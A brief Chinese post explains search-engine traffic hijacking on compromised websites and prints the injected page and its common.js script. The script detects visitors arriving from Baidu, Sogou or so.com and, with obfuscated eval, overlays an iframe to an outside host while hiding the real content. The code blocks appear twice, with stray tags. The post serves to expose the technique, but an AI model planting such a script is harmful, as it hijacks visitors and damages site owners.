不少企业或个人网站被人恶意挂了违规内容,劫持搜索流量,影响网站正常收录,同时可能涉及违法违规。
这类情况,直接访问会发现网站能正常访问浏览,但从指定搜索网站进去就加载了嵌入页面。
今天刚好看到这样一个页面,代码如下:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>document.title='XXXXXX有限公司';</script>
<title>测试代码-chinae.org-站长联盟</title>
<meta name="keywords" content="测试代码-chinae.org-站长联盟" />
<meta name="description" content="测试代码-chinae.org-站长联盟" />
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<script language="javascript" type="text/javascript" src="/common.js"></script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>document.title='XXXXXX有限公司';</script>
<title>测试代码-chinae.org-站长联盟</title>
<meta name="keywords" content="测试代码-chinae.org-站长联盟" />
<meta name="description" content="测试代码-chinae.org-站长联盟" />
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<script language="javascript" type="text/javascript" src="/common.js"></script>
测试页面
</body>
</html>
其中common.js代码如下:
var titlestr = document.title;
var arr = ["http://www.xxxx.com:21008"];
var referer = document.referrer;
var regex=/(baidu.com|sogou.com|so.com)/i;
if(regex.test(referer))
{
setFrame(arr[Math.floor(Math.random() * arr.length)]);
}
function setFrame(olink) {
var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><ifr' + 'ame scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>';
eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');");
try {
setTimeout(function() {
console.log(document.body.children.length);
for (var i = 0; i < document.body.children.length; i++) {
try {
var a = document.body.children[i].tagName;
var b = document.body.children[i].id;
console.log(i + "***" + a + "**" + b);
if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") {
document.body.children[i].style.display = "non" + "e"
}
} catch(e) {}
}
var oMeta = document.createElement('meta');
oMeta.name = 'viewport';
oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no';
document.getElementsByTagName('head')[0].appendChild(oMeta);
},
100)
} catch(e) {}
}
</body>
</html>
其中common.js代码如下:
var titlestr = document.title;
var arr = ["http://www.xxxx.com:21008"];
var referer = document.referrer;
var regex=/(baidu.com|sogou.com|so.com)/i;
if(regex.test(referer))
{
setFrame(arr[Math.floor(Math.random() * arr.length)]);
}
function setFrame(olink) {
var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><ifr' + 'ame scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>';
eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');");
try {
setTimeout(function() {
console.log(document.body.children.length);
for (var i = 0; i < document.body.children.length; i++) {
try {
var a = document.body.children[i].tagName;
var b = document.body.children[i].id;
console.log(i + "***" + a + "**" + b);
if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") {
document.body.children[i].style.display = "non" + "e"
}
} catch(e) {}
}
var oMeta = document.createElement('meta');
oMeta.name = 'viewport';
oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no';
document.getElementsByTagName('head')[0].appendChild(oMeta);
},
100)
} catch(e) {}
}